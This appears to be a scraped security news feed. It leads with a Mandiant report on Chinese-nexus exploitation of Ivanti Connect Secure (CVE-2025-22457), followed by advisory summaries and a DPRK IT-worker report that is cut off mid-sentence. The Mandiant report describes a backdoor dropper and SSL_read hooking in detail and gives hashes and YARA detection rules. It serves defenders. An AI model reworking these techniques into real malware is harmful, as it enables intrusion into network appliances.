Written by: John Wolfram, Michael Edie, Jacob Thompson, Matt Lin, Josh Murchie On Thursday, April 3, 2025, Ivanti disclosed a critical security vulnerability, CVE-2025-22457, impacting Ivanti Connect Secure (“ICS”) VPN appliances version 22.7R2.5 and earlier. CVE-2025-22457 is a buffer overflow vulnerability, and successful exploitation would result in remote code execution. Mandiant and Ivanti have identified evidence of active exploitation in the wild against ICS 9.X (end of life) and 22.7R2.5 and earlier versions. Ivanti and Mandiant encourage all customers to upgrade as soon as possible.  The earliest evidence of observed CVE-2025-22457 exploitation occurred in mid-March 2025. Following successful exploitation, we observed the deployment of two newly identified malware families, the TRAILBLAZE in-memory only dropper and the BRUSHFIRE passive backdoor. Additionally, deployment of the previously reported SPAWN ecosystem of malware attributed to UNC5221 was also observed. UNC5221 is a suspected China-nexus espionage actor that we previously observed conducting zero-day exploitation of edge devices dating back to 2023. A patch for CVE-2025-22457 was released in ICS 22.7R2.6 on February 11, 2025. The vulnerability is a buffer overflow with a limited character space, and therefore it was initially believed to be a low-risk denial-of-service vulnerability. We assess it is likely the threat actor studied the patch for the vulnerability in ICS 22.7R2.6 and uncovered through a complicated process, it was possible to exploit 22.7R2.5 and earlier to achieve remote code execution. Ivanti released patches for the exploited vulnerability and Ivanti customers are urged to follow the actions in the Security Advisory to secure their systems as soon as possible. Post-Exploitation Tactics, Techniques, and Procedures Following successful exploitation, Mandiant observed the deployment of two newly identified malware families tracked as TRAILBLAZE and BRUSHFIRE through a shell script dropper. Mandiant has also observed the deployment of the SPAWN ecosystem of malware. Additionally, similar to previously observed behavior, the actor attempted to modify the Integrity Checker Tool (ICT) in an attempt to evade detection.   Shell-script Dropper Following successful exploitation of CVE-2025-22457, Mandiant observed a shell script being leveraged that executes the TRAILBLAZE dropper. This dropper injects the BRUSHFIRE passive backdoor into a running /home/bin/web process. The first stage begins by searching for a /home/bin/web process that is a child process of another /home/bin/web process (the point of this appears to be to inject into the web process that is actually listening for connections). It then creates the the following files and associated content: /tmp/.p: contains the PID of the /home/bin/web process. /tmp/.m: contains a memory map of that process (human-readable). /tmp/.w: contains the base address of the web binary from that process /tmp/.s: contains the base address of libssl.so from that process /tmp/.r: contains the BRUSHFIRE passive backdoor /tmp/.i: contains the TRAILBLAZE dropper The shell script then executes /tmp/.i, which is the second stage in-memory only dropper tracked as TRAILBLAZE. It then deletes all of the temporary files previously created (except for /tmp/.p), as well as the contents of the /data/var/cores directory. Next, all child processes of the /home/bin/web process are killed and the /tmp/.p file is deleted. All of this behavior is non-persistent, and the dropper will need to be re-executed if the system or process is rebooted. TRAILBLAZE TRAILBLAZE is an in-memory only dropper written in bare C that uses raw syscalls and is designed to be as minimal as possible, likely to ensure it can fit within the shell script as Base64. TRAILBLAZE injects a hook into the identified /home/bin/web process. It will then inject the BRUSHFIRE passive backdoor into a code cave inside that process. BRUSHFIRE BRUSHFIRE is a passive backdoor written in bare C that acts as an SSL_read hook. It first executes the original SSL_read function, and checks to see if the returned data begins with a specific string. If the data begins with the string, it will XOR decrypt then execute shellcode contained in the data. If the received shellcode returns a value, the backdoor will call SSL_write to send the value back. SPAWNSLOTH As detailed in our previous blog post, SPAWNSLOTH acts as a log tampering component tied to the SPAWNSNAIL backdoor. It targets the dslogserver process to disable both local logging and remote syslog forwarding. SPAWNSNARE SPAWNSNARE is a utility that is written in C and targets Linux. It can be used to extract the uncompressed linux kernel image (vmlinux) into a file and encrypt it using AES without the need for any command line tools. SPAWNWAVE SPAWNWAVE is an evolved version of SPAWNANT that combines capabilities from other members of the SPAWN* malware ecosystem. SPAWNWAVE overlaps with the publicly reported SPAWNCHIMERA and RESURGE malware families. Attribution Google Threat Intelligence Group (GTIG) attributes the exploitation of CVE-2025-22457 and the subsequent deployment of the SPAWN ecosystem of malware to the suspected China-nexus espionage actor UNC5221. GTIG has previously reported UNC5221 conducting zero-day exploitation of CVE-2025-0282, as well as the exploitation CVE-2023-46805 and CVE-2024-21887.  Furthermore, GTIG has also previously observed UNC5221 conducting zero-day exploitation of CVE-2023-4966, impacting NetScaler ADC and NetScaler Gateway appliances. UNC5221 has targeted a wide range of countries and verticals during their operations, and has leveraged an extensive set of tooling, spanning passive backdoors to trojanized legitimate components on various edge appliances.  GTIG assesses that UNC5221 will continue pursuing zero-day exploitation of edge devices based on their consistent history of success and aggressive operational tempo. Additionally, as noted in our prior blog post detailing CVE-2025-0282 exploitation, GTIG has observed UNC5221 leveraging an obfuscation network of compromised Cyberoam appliances, QNAP devices, and ASUS routers to mask their true source during intrusion operations. Conclusion This latest activity from UNC5221 underscores the ongoing sophisticated threats targeting edge devices globally. This campaign, exploiting the n-day vulnerability CVE-2025-22457, also highlights the persistent focus of actors like UNC5221 on edge devices, leveraging deep device knowledge and adding to their history of using both zero-day and now n-day flaws. This activity aligns with the broader strategy GTIG has observed among suspected China-nexus espionage groups who invest significantly in exploits and custom malware for critical edge infrastructure. Recommendations  Mandiant recommends organizations immediately apply the available patch by upgrading Ivanti Connect Secure (ICS) appliances to version 22.7R2.6 or later to address CVE-2025-22457. Additionally organizations should use the external and internal Integrity Checker Tool (“ICT”) and contact Ivanti Support if suspicious activity is identified. To supplement this, defenders should actively monitor for core dumps related to the web process, investigate ICT statedump files, and conduct anomaly detection of client TLS certificates presented to the appliance. Acknowledgements We would like to thank Daniel Spicer and the rest of the team at Ivanti for their continued partnership and support in this investigation. Additionally, this analysis would not have been possible without the assistance from analysts across Google Threat Intelligence Group and Mandiant’s FLARE, we would like to specifically thank Christopher Gardner and Dhanesh Kizhakkinan of FLARE for their support. Indicators of Compromise To assist the security community in hunting and identifying activity outlined in this blog post, we have included indicators of compromise (IOCs) in a GTI Collection for registered users. Code Family MD5 Filename Description TRAILBLAZE 4628a501088c31f53b5c9ddf6788e835 /tmp/.i In-memory dropper BRUSHFIRE e5192258c27e712c7acf80303e68980b /tmp/.r Passive backdoor SPAWNSNARE 6e01ef1367ea81994578526b3bd331d6 /bin/dsmain Kernel extractor & encryptor SPAWNWAVE ce2b6a554ae46b5eb7d79ca5e7f440da /lib/libdsupgrade.so Implant utility SPAWNSLOTH 10659b392e7f5b30b375b94cae4fdca0 /tmp/.liblogblock.so Log tampering utility YARA Rules rule M_APT_Installer_SPAWNANT_1 { meta: author = "Mandiant" description = "Detects SPAWNANT. SPAWNANT is an Installer targeting Ivanti devices. Its purpose is to persistently install other malware from the SPAWN family (SPAWNSNAIL, SPAWNMOLE) as well as drop additional webshells on the box." strings: $s1 = "dspkginstall" ascii fullword $s2 = "vsnprintf" ascii fullword $s3 = "bom_files" ascii fullword $s4 = "do-install" ascii $s5 = "ld.so.preload" ascii $s6 = "LD_PRELOAD" ascii $s7 = "scanner.py" ascii condition: uint32(0) == 0x464c457f and 5 of ($s*) } rule M_Utility_SPAWNSNARE_1 { meta: author = "Mandiant" description = "SPAWNSNARE is a utility written in C that targets Linux systems by extracting the uncompressed Linux kernel image into a file and encrypting it with AES." strings: $s1 = "\x00extract_vmlinux\x00" $s2 = "\x00encrypt_file\x00" $s3 = "\x00decrypt_file\x00" $s4 = "\x00lbb_main\x00" $s5 = "\x00busybox\x00" $s6 = "\x00/etc/busybox.conf\x00" condition: uint32(0) == 0x464c457f and all of them } rule M_APT_Utility_SPAWNSLOTH_2 { meta: author = "Mandiant" description = "Hunting rule to identify strings found in SPAWNSLOTH" strings: $dslog = "dslogserver" ascii fullword $hook1 = "g_do_syslog_servers_exist" ascii fullword $hook2 = "ZN5DSLog4File3addEPKci" ascii fullword $hook3 = "funchook" ascii fullword condition: uint32(0) == 0x464c457f and all of them }

https://cloud.google.com/blog/topics/threat-intelligence/china-nexus-exploiting-critical-ivanti-vulnerability/
Von der Frontlinie: Was Fortune 100 CISOs über die Zukunft der Cybersecurity sagen
2025-04-03T13:00:51Z | 1743685251

Over the past few weeks, I’ve had the opportunity to meet with CISOs and CIOs from Fortune 100 companies and... The post From the Frontlines: What Fortune 100 CISOs Are Saying About the Future of Cybersecurity appeared first on Skyhigh Security.

https://www.skyhighsecurity.com/industry-perspectives/from-the-frontlines-what-fortune-100-cisos-are-saying-about-the-future-of-cybersecurity.html
Introducing TeamCity’s New Design, Phase 1
2025-04-03T11:35:54Z | 1743680154

TeamCity is introducing a batch of UX/UI improvements and more in its latest release. With the December release of TeamCity 2024.12, we updated the main navigation and breadcrumb trail. Now, we’re excited to introduce the Settings view and updated page headers, making managing your projects and builds easier. By observing how people use TeamCity and […]

https://blog.jetbrains.com/teamcity/2025/04/introducing-teamcitys-new-design-phase-1/
Annual report from the actions of CERT Polska 2024
2025-04-03T10:40:00Z | 1743676800

Another year of CERT Polska’s activities is behind us. An absolutely record-breaking year, if we take into account practically all the statistics cited in our previous reports. Behind these numbers is the daily work of experts who care for the safety of Poles online every day. This year’s report is about this work, the key challenges we face and the threats we analyse.

https://cert.pl/en/posts/2025/04/annual-report-2024/
Red Flag Bulletin | April 2025 | Le Pen found guilty of misappropriating European Parliament funds
2025-04-03T09:24:25Z | 1743672265

This month’s Red Flag Bulletin includes the following stories: African NGOs file corruption complaint against Bolloré SE and Vincent Bolloré in France; SEC begins hosting roundtables on cryptocurrency regulation; and Marine Le Pen found guilty of misappropriating European Parliament funds worth EUR 2.9 million. Middle East and North Africa Iran: US sanctions the Iranian Oil Minister and an international transportation network for Iranian-origin crude oil On 13 March, the US Department of the Treasury’s Office of Foreign Assets Control (OFAC) designated Mohsen Paknejad, who has been the Minister of Petroleum of Iran since August 2024. In this role, he oversees the National Iranian Oil Company (NIOC). According to the press release, Paknejad has allocated over 200,000 barrels of Iranian oil to the Iranian armed forces for export. OFAC designated 17 entities and 13 vessels, including: Seychelles-registered Fallon Shipping Company Limited and Bangladesh-based Aren Ship Management, the owner and manager of Iran-flagged POLARIS 1, which has transported thousands of tons of NIOC fuel. This action was the third round of sanctions targeted Iranian oil sales since the President ordered a campaign of maximum pressure on Iran in February 2025.

https://www.s-rminform.com/red-flag-bulletin/april-2025
The good, the bad and the unknown of AI: A Q&A with Mária Bieliková
2025-04-03T09:00:00Z | 1743670800

The computer scientist and AI researcher shares her thoughts on the technology’s potential and pitfalls – and what may lie ahead for us

https://www.welivesecurity.com/en/we-live-science/good-bad-unknown-ai-qa-maria-bielikova/
CVE-2025-29796 Microsoft Edge for iOS Spoofing Vulnerability
2025-04-03T07:00:00Z | 1743663600

User interface (ui) misrepresentation of critical information in Microsoft Edge for iOS allows an unauthorized attacker to perform spoofing over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-29796
CVE-2025-29815 Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability
2025-04-03T07:00:00Z | 1743663600

Use after free in Microsoft Edge (Chromium-based) allows an authorized attacker to execute code over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-29815
CVE-2025-25001 Microsoft Edge for iOS Spoofing Vulnerability
2025-04-03T07:00:00Z | 1743663600

Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Edge (Chromium-based) allows an unauthorized attacker to perform spoofing over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-25001
CVE-2025-25000 Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability
2025-04-03T07:00:00Z | 1743663600

Access of resource using incompatible type ('type confusion') in Microsoft Edge (Chromium-based) allows an unauthorized attacker to execute code over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-25000
Why SASE Makes Zero Trust Work
2025-04-03T06:53:51Z | 1743663231

Gartner® predicted that by early this year, over 60% of organizations would be using zero trust as their starting point for security. And no wonder. Cloud migration, hybrid work, and persistent threats have turned security into a minefield, exposing the cracks in old castle and moat, perimeter-based security architectures.   Zero Trust aligns with how and... The post Why SASE Makes Zero Trust Work    appeared first on Cato Networks.

https://www.catonetworks.com/blog/why-sase-makes-zero-trust-work/
New guidance on securing HTTP-based APIs
2025-04-03T06:28:42Z | 1743661722

Why it’s essential to secure your APIs to build trust with your customers and partners.

https://www.ncsc.gov.uk/blog-post/new-guidance-on-securing-http-based-apis
JSAC2025 -Workshop & Lightning Talk-
2025-04-03T06:00:00Z | 1743660000

Following the previous blog post on the Main Track on Day 2, this article highlights the Workshops and Lightning Talks of JSAC2025.

https://blogs.jpcert.or.jp/en/2025/04/jsac2025-workshop-lightning-talk.html
ZDI-25-197: Autodesk Navisworks Freedom DWFX File Parsing Out-Of-Bounds Read Remote Code Execution Vulnerability
2025-04-03T05:00:00Z | 1743656400

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Autodesk Navisworks Freedom. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2025-1658.

http://www.zerodayinitiative.com/advisories/ZDI-25-197/
ZDI-25-198: Autodesk Navisworks Freedom DWFX File Parsing Out-Of-Bounds Read Remote Code Execution Vulnerability
2025-04-03T05:00:00Z | 1743656400

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Autodesk Navisworks Freedom. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2025-1659.

http://www.zerodayinitiative.com/advisories/ZDI-25-198/
ZDI-25-199: Autodesk Navisworks Freedom DWFX File Parsing Memory Corruption Remote Code Execution Vulnerability
2025-04-03T05:00:00Z | 1743656400

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Autodesk Navisworks Freedom. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2025-1660.

http://www.zerodayinitiative.com/advisories/ZDI-25-199/
Security Alert (A25-04-04): Multiple Vulnerabilities in Cisco Products
2025-04-03T04:00:00Z | 1743652800

Cisco released security advisories to address multiple vulnerabilities in Cisco devices and software.

https://www.govcert.gov.hk/en/alerts_detail.php
The Impact of Cybersecurity on Business and Brand Risk Reduction
2025-04-03T00:00:00Z | 1743638400

Discover how cybersecurity impacts your bottom line. Learn how threat intelligence helps reduce fraud, downtime, insurance costs, and reputational damage—driving 351% ROI.

https://www.recordedfuture.com/blog/impact-cybersecurity-business-brand-risk-reduction
Protecting controlled information in non-Government of Canada systems and organizations (ITSP.10.171)
2025-04-02T20:35:16Z | 1743626116

https://cyber.gc.ca/en/guidance/protecting-controlled-information-non-government-canada-systems-and-organizations-itsp10171
Huawei Wins Nine Lightwave+BTR Innovation Reviews Awards, Hitting a Record High
2025-04-02T18:02:00Z | 1743616920

On April 1, Lightwave, a world-renowned telecom media, presented its Lightwave+BTR Innovation Reviews winners. Huawei won nine awards

//www.huawei.com/en/news/2025/4/nine-lightwavebtr-innovation-reviews-honorees
Carrier Aggregation Shines in Spotlight with Taylor Swift-inspired Metrics
2025-04-02T15:47:02Z | 1743608822

Recent announcements by major North American mobile service providers are once again putting carrier aggregation in the spotlight. On January 7, 2025, Verizon announced the achievement of 5.5Gbps download speeds—"the equivalent of downloading 266 Taylor Swift albums a minute or streaming 3,056 Hulu episodes per hour.”...

https://www.netscout.com/blog/carrier-aggregation-shines-spotlight-taylor-swift-inspired
Tenable Achieves FedRAMP Authorization for Tenable One and Tenable Cloud Security
2025-04-02T13:00:00Z | 1743598800

Tenable®, the exposure management company, today announced that it achieved Federal Risk and Authorization Management Program (FedRAMP®) authorization at the Moderate impact level for its Tenable One Exposure Management Platform as well as Tenable Cloud Security, underscoring its commitment to strengthening government infrastructure and reducing cybersecurity risk to support national security. Tenable released Tenable One FedRAMP and Tenable Cloud Security FedRAMP to enable U.S. federal agencies to unify security visibility, insight and action from IT to the cloud to OT and everywhere in between. Tenable is a long-time trusted government partner with a deep understanding of the public sector’s unique needs and requirements. The new authorizations come just months after the availability of Tenable Enclave Security was announced. This solution supports the needs of customers operating in highly secure environments, such as those that are classified or otherwise air-gapped, and is built to support the strictest security requirements, including FedRAMP High and Impact Level 5.Tenable One FedRAMP is a revolutionary cloud-based exposure management platform that unifies discovery and visibility into all types of assets and assesses their exposures and vulnerabilities across the entire attack surface. The platform unifies one view of risk across all assets, connects the dots between the lethal risk relationships that span solution silos, and brings together disparate teams with the intelligence they need to protect against attacks.Tenable Cloud Security FedRAMP, the actionable cloud security platform, enables federal agencies to strengthen their cloud infrastructure by rapidly exposing and closing security gaps caused by cloud misconfigurations, risky entitlements and vulnerabilities. Tenable Cloud Security FedRAMP is a leading Cloud Native Application Protection Platform (CNAPP) solution that isolates and minimizes these risks at scale across infrastructure, workloads, identities and data in the cloud.“As a trusted provider to the federal government, Tenable is dedicated to helping agencies advance their mission and modernize their approach to security,” said Bob Huber, chief security officer and president of Tenable Public Sector, LLC. “This FedRAMP authorization reinforces our commitment to continued innovation and accelerated adoption of cloud technologies in the U.S. government. We’re eager to work with federal agencies to evolve their approach to security and eliminate exposures that drive up cyber risk.”More information on Tenable One FedRAMP and Tenable Cloud Security FedRAMP are available at: https://www.tenable.com/solutions/government/us-fed About TenableTenable® is the exposure management company, exposing and closing the cybersecurity gaps that erode business value, reputation and trust. The company’s AI-powered exposure management platform radically unifies security visibility, insight and action across the attack surface, equipping modern organizations to protect against attacks from IT infrastructure to cloud environments to critical infrastructure and everywhere in between. By protecting enterprises from security exposure, Tenable reduces business risk for approximately 44,000 customers around the globe. Learn more at tenable.com. ###Media Contact:Tenabletenablepr@tenable.com

https://www.tenable.com/press-releases/tenable-achieves-fedramp-authorization-for-tenable-one-and-tenable-cloud-security
NIST CSF 2.0: Updated Third Party & Supply Chain Risk Management – Part 2
2025-04-02T12:00:00Z | 1743595200

By: Val Mahanor, Director, Cybersecurity, RiskRecon By Mastercard NIST CSF 2.0: Updated Third Party & Supply Chain Risk Management – Part 2 As reviewed in the first blog post, third-party data breaches and security incidents continue to dominate news headlines, highlighting the importance of stronger risk management practices. This is why industry standards like NIST's Cybersecurity Framework (CSF) 2.0 are crucial, as they provide guidance to enhance cybersecurity and third-party risk programs.

https://blog.riskrecon.com/nist-csf-2.0-updated-third-party-supply-chain-risk-management-part-2
It takes two: The 2025 Sophos Active Adversary Report
2025-04-02T10:01:16Z | 1743588076

The dawn of our fifth year deepens our understanding of the enemies at the gate, and some tensions inside it; plus, an anniversary gift from us to you

https://news.sophos.com/en-us/2025/04/02/2025-sophos-active-adversary-report/
Cisco’s 2025 Data Privacy Benchmark Study: Privacy landscape grows increasingly complex in the age of AI
2025-04-02T10:00:00Z | 1743588000

As data privacy remains critical to establishing business value and trust, the study uncovers a complex landscape where the demand for local data storage intersects with reliance on global providers’ expertise.More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m04/cisco-2025-data-privacy-benchmark-study-privacy-landscape-grows-increasingly-complex-in-the-age-of-ai.html
Building trust in the age of AI
2025-04-02T10:00:00Z | 1743588000

Dev Stahlkopf, Cisco’s chief legal officer, on key results from the company’s latest Data Privacy Benchmark Study. More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m04/building-trust-in-the-age-of-ai.html
Building trust in the age of AI
2025-04-02T10:00:00Z | 1743588000

Dev Stahlkopf, Cisco’s chief legal officer, on key results from the company’s latest Data Privacy Benchmark Study. More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m04/building-trust-in-the-age-of-ai.html
Active Directory Security: How Deception Detects and Prevents Detect Privilege Escalation Dynamic Deception and Scalability
2025-04-02T08:59:24Z | 1743584364

Active Directory (AD) is the gatekeeper of enterprise infrastructure. It governs who has access to what, from user logins to critical systems, apps, and files. But as integral as AD is, it remains one of the most frequently targeted, and often most under-defended elements in modern cybersecurity. Attackers know that breaching Active Directory gives them […] The post Active Directory Security: How Deception Detects and Prevents Detect Privilege Escalation Dynamic Deception and Scalability appeared first on CounterCraft.

https://www.countercraftsec.com/blog/active-directory-security-privilege-escalation/
New online training helps board members to govern cyber risk
2025-04-02T08:57:30Z | 1743584250

The NCSC’s CEO, Richard Horne on the new cyber governance resources giving Boards the tools they need to govern cyber security risks.

https://www.ncsc.gov.uk/blog-post/new-online-training-helps-board-members-govern-cyber-risk
CVE-2025-21336 Windows Cryptographic Information Disclosure Vulnerability
2025-04-02T07:00:00Z | 1743577200

Updated CWE value. This is an informational change only.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-21336
Security Alert (A25-04-02): Multiple Vulnerabilities in Firefox
2025-04-02T04:00:00Z | 1743566400

Mozilla has published the advisories (MFSA2025-20, MFSA2025-21, MFSA2025-22, MFSA2025-23 and MFSA2025-24) to address multiple vulnerabilities in Firefox browser.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A25-04-03): Multiple Vulnerabilities in Google Chrome
2025-04-02T04:00:00Z | 1743566400

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
STMicroelectronics X-CUBE-AZRTOS-F7 HTTP server denial of service vulnerability
2025-04-02T00:00:00Z | 1743552000

https://talosintelligence.com/vulnerability_reports/TALOS-2024-2097
STMicroelectronics X-CUBE-AZRTOS-F7 HTTP server chunked PUT request integer underflow vulnerability
2025-04-02T00:00:00Z | 1743552000

https://talosintelligence.com/vulnerability_reports/TALOS-2024-2102
STMicroelectronics X-CUBE-AZRTOS-F7 FileX Internal RAM interface buffer overflow vulnerability
2025-04-02T00:00:00Z | 1743552000

https://talosintelligence.com/vulnerability_reports/TALOS-2024-2096
STMicroelectronics X-CUBE-AZRTOS-F7 HTTP server single PUT request integer underflow vulnerability
2025-04-02T00:00:00Z | 1743552000

https://talosintelligence.com/vulnerability_reports/TALOS-2024-2103
Modern Attacks, Better Network Protection: 3 Must-Haves for Finance by Nicole Drake
2025-04-02T00:00:00Z | 1743552000

How is AI really transforming cybersecurity? See how security teams are leveraging Vectra AI to protect their modern networks today.

https://www.vectra.ai/blog/modern-attacks-better-network-protection-3-must-haves-for-finance
An Improved Detection Signature for the Kubernetes IngressNightmare Vulnerability
2025-04-01T21:50:22Z | 1743544222

Wiz recently published a detailed analysis of a critical vulnerability in the NGINX Ingress admission controller—what they’ve dubbed IngressNightmare (CVE-2025-1097, CVE-2025-1098, CVE-2025-1974, CVE-2025-24514). The vulnerability stems from insufficient input validation during configuration file processing, allowing an attacker to inject arbitrary code into the NGINX process. Wiz’s writeup is excellent and covers the technical nuances thoroughly, […] The post An Improved Detection Signature for the Kubernetes IngressNightmare Vulnerability appeared first on Praetorian.

https://www.praetorian.com/blog/an-improved-detection-signature-for-the-kubernetes-ingress-nightmare/
Cross-Domain Solutions in Action: Real-World Lessons in Secure AI Data Exchange
2025-04-01T17:06:45Z | 1743527205

Cross-Domain Solutions in Action: Real-World Lessons in Secure AI Data Exchange As artificial intelligence (AI) becomes more embedded in mission-critical operations, the need for secure, reliable data flow is more significant than ever. Cross-domain solutions (CDS) are no longer theoretical solutions—they’re actively transforming how defense, healthcare, finance, and infrastructure organizations protect AI-driven data and decisions.... View Article The post Cross-Domain Solutions in Action: Real-World Lessons in Secure AI Data Exchange appeared first on Owl Cyber Defense.

https://owlcyberdefense.com/blog/cross-domain-solutions-secure-ai/
Mobile device guidance for high profile travellers (ITSAP.00.088)
2025-04-01T17:02:52Z | 1743526972

https://cyber.gc.ca/en/guidance/mobile-device-guidance-high-profile-travellers-itsap-00088
Toll Scams Are What's Happen.xin Right Now
2025-04-01T17:00:00Z | 1743526800

Have you ever received an odd text message on your phone, purporting to be from a toll provider or package delivery service? If you have a U.S. cell phone, chances are you’ve encountered one of these SMiShing attempts—cybercriminals’ latest ploy to trick you into giving up your personal and financial details. SMiShing (a portmanteau of SMS and phishing) relies on victims clicking deceptive links that appear legitimate but actually lead to malicious websites.

https://www.threatstop.com/blog/toll-scams-are-whats-happen.xin-right-now
Unlocking the Next Wave of Edge Computing with Serverless WebAssembly
2025-04-01T16:00:00Z | 1743523200

https://www.akamai.com/blog/cloud/2025/apr/unlocking-next-wave-edge-computing-serverless-webassembly
What Happened Before the Breach?
2025-04-01T14:24:13Z | 1743517453

A major insurance provider is reeling from a catastrophic data breach. Sensitive customer data, including personally identifiable information (PII), policy details, and financial records, has been compromised. Trust is eroding, regulatory fines are imminent, and the company is left scrambling for answers. But how did...

https://www.netscout.com/blog/what-happened-breach-6
Building and Deploying Microservices With Spring Boot and TeamCity
2025-04-01T13:13:04Z | 1743513184

This tutorial was brought to you by Rajkumar Venkatasamy, draft.dev. Microservice architecture has become a cornerstone for building scalable and maintainable applications. Microservices allow individual services to be developed, deployed, and scaled independently, resulting in faster delivery cycles and improved fault isolation.  For example, an e-commerce platform can use independent services to handle product catalogs, […]

https://blog.jetbrains.com/teamcity/2025/04/building-and-deploying-microservices-spring-boot-teamcity/
EfficientIP and Fortinet: Network Security Automation
2025-04-01T13:00:53Z | 1743512453

In today’s rapidly evolving digital landscape, ensuring robust security while maintaining operational efficiency is a challenge. The EfficientIP and Fortinet integration automates IP and subnet updates within security policies, enhancing visibility, improving efficiency, and ensuring consistent policy enforcement. This blog explores how this joint solution streamlines network and security operations to fortify modern enterprise infrastructure.… The post EfficientIP and Fortinet: Network Security Automation appeared first on EfficientIP.

https://efficientip.com/blog/efficientip-and-fortinet-network-security-automation/
Anatomy of a SYN-ACK Attack
2025-04-01T12:00:00Z | 1743508800

https://www.akamai.com/blog/security/anatomy-of-a-syn-ack-attack
DPRK IT Workers Expanding in Scope and Scale
2025-04-01T12:00:00Z | 1743508800

Written by: Jamie Collier Since our September 2024 report outlining the Democratic People's Republic of Korea (DPRK) IT worker threat, the scope and scale of their operations has continued to expand. These individuals pose as legitimate remote workers to infiltrate companies and generate revenue for the regime. This places organizations that hire DPRK IT workers at risk of espionage, data theft, and disruption. In collaboration with partners, Google Threat Intelligence Group (GTIG) has identified an increase of active operations in Europe, confirming the threat's expansion beyond the United States. This growth is coupled with evolving tactics, such as intensified extortion campaigns and the move to conduct operations within corporate virtualized infrastructure.  On The March: IT Workers Expand Globally with a Focus on Europe DPRK IT workers' activity across multiple countries now establishes them as a global threat. While the United States remains a key target, over the past months, DPRK IT workers have encountered challenges in seeking and maintaining employment in the country. This is likely due to increased awareness of the threat through public reporting, United States Department of Justice indictments, and right-to-work verification challenges. These factors have instigated a global expansion of IT worker operations, with a notable focus on Europe. Figure 1: List of countries impacted by DPRK IT workers IT Worker Activity in Europe  In late 2024, one DPRK IT worker operated at least 12 personas across Europe and the United States. The IT Worker actively sought employment with multiple organizations within Europe, particularly those within the defense industrial base and government sectors. This individual demonstrated a pattern of providing fabricated references, building a rapport with job recruiters, and using additional personas they controlled to vouch for their credibility. Separately, additional investigations uncovered other IT worker personas seeking employment in Germany and Portugal, alongside login credentials for user accounts of European job websites and human capital management platforms. GTIG has also observed a diverse portfolio of projects in the United Kingdom undertaken by DPRK IT workers. These projects included web development, bot development, content management system (CMS) development, and blockchain technology, indicating a broad range of technical expertise, spanning traditional web development to advanced blockchain and AI applications.  Specific projects identified include: Development of a Nodexa token hosting plan platform using Next.js, React, CosmosSDK, and Golang, as well as the creation of a job marketplace using Next.js, Tailwind CSS, MongoDB, and Node.js.  Further blockchain-related projects involved Solana and Anchor/Rust smart contract development, and a blockchain job marketplace built using the MERN stack and Solana.  Contributions to existing websites by adding pages using Next.js and Tailwind CSS,  Development of an artificial intelligence (AI) web application leveraging Electron, Next.js, AI, and blockchain technologies.  In their efforts to secure these positions, DPRK IT workers employed deceptive tactics, falsely claiming nationalities from a diverse set of countries, including Italy, Japan, Malaysia, Singapore, Ukraine, the United States, and Vietnam. The identities used were a combination of real and fabricated personas.  IT workers in Europe were recruited through various online platforms, including Upwork, Telegram, and Freelancer. Payment for their services was facilitated through cryptocurrency, the TransferWise service, and Payoneer, highlighting the use of methods that obfuscate the origin and destination of funds. Facilitators Support European Operations  The facilitators used by IT workers to help them get jobs, defeat identity verification, and receive funds fraudulently have also been found in Europe. One incident involved a DPRK IT worker using facilitators located in both the United States and the United Kingdom. Notably, a corporate laptop, ostensibly intended for use in New York, was found to be operational in London, indicating a complex logistical chain.  An investigation into infrastructure used by a suspected facilitator also highlighted heightened interest in Europe. Resources discovered contained fabricated personas, including resumes listing degrees from Belgrade University in Serbia and residences in Slovakia, as well as instructions for navigating European job sites. Additionally, contact information for a broker specializing in false passports was discovered, indicating a coordinated effort to acquire fraudulent identification documents. One document provided specific guidance on seeking employment in Serbia, including the use of a Serbian time zone during communications.  Extortion Heating Up Alongside global expansion, DPRK IT workers are also evolving their tactics. Based on data from multiple sources, GTIG assesses that since late October 2024, IT workers have increased the volume of extortion attempts and gone after larger organizations.  In these incidents, recently fired IT workers threatened to release their former employers’ sensitive data or to provide it to a competitor. This data included proprietary data and source code for internal projects.  The increase in extortion campaigns coincided with heightened United States law enforcement actions against DPRK IT workers, including disruptions and indictments. This suggests a potential link, where pressure on these workers may be driving them to adopt more aggressive measures to maintain their revenue stream.  Previously, workers terminated from their places of employment might attempt to provide references for their other personas so that they could be rehired by the company. It is possible that the workers suspected they were terminated due to discovery of their true identities, which would preclude attempts to be rehired. The Virtual Workspace: BYOD Brings IT Worker Risks  To avoid distributing corporate laptops, some companies operate a bring your own device (BYOD) policy, allowing employees to access company systems through virtual machines. Unlike corporate laptops that can be monitored, personal devices operating under a BYOD policy may lack traditional security and logging tools, making it difficult to track activities and identify potential threats. This absence of conventional security measures means that typical evidence trails linked to IT workers, such as those derived from corporate laptop shipping addresses and endpoint software inventories, are unavailable. All of this increases the risk of undetected malicious activity. GTIG believes that IT workers have identified BYOD environments as potentially ripe for their schemes, and in January 2025, IT workers are now conducting operations against their employers in these scenarios.  Conclusion  Global expansion, extortion tactics, and the use of virtualized 